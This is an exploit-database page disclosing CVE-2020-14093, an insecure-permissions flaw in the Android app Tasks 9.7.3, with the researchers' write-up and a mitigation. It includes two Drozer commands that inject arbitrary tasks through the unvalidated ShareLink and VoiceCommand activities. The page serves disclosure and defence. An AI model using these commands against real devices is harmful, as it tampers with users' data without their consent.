header-logo
Suggest Exploit
vendor:
Tasks
by:
Lyhin's Lab
5.9
CVSS
MEDIUM
Insecure Permissions
284
CWE
Product Name: Tasks
Affected Version From: 9.7.3
Affected Version To: 9.7.3
Patch Exists: YES
Related CWE: CVE-2020-14093
CPE: a:tasks:tasks:9.7.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-14093/
Other Scripts: N/A
Platforms Tested: Android 9
2020

Tasks 9.7.3 – Insecure Permissions

Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. A malicious application has several ways of how to achieve that: 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested 'task' to the user's task list. 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. We used the Drozer application to emulate malicious app activity.

Mitigation:

Ensure that all IPCs are properly validated and authenticated before allowing any action to be performed.
Source

Exploit-DB raw data:

# Exploit Title: Tasks 9.7.3 - Insecure Permissions
# Date: 18th of July, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9

Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. 
A malicious application has several ways of how to achieve that:

1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.

2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.

We used the Drozer application to emulate malicious app activity. Please find the commands below.

run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"

Navigation

Suggest Exploit

Services By CQR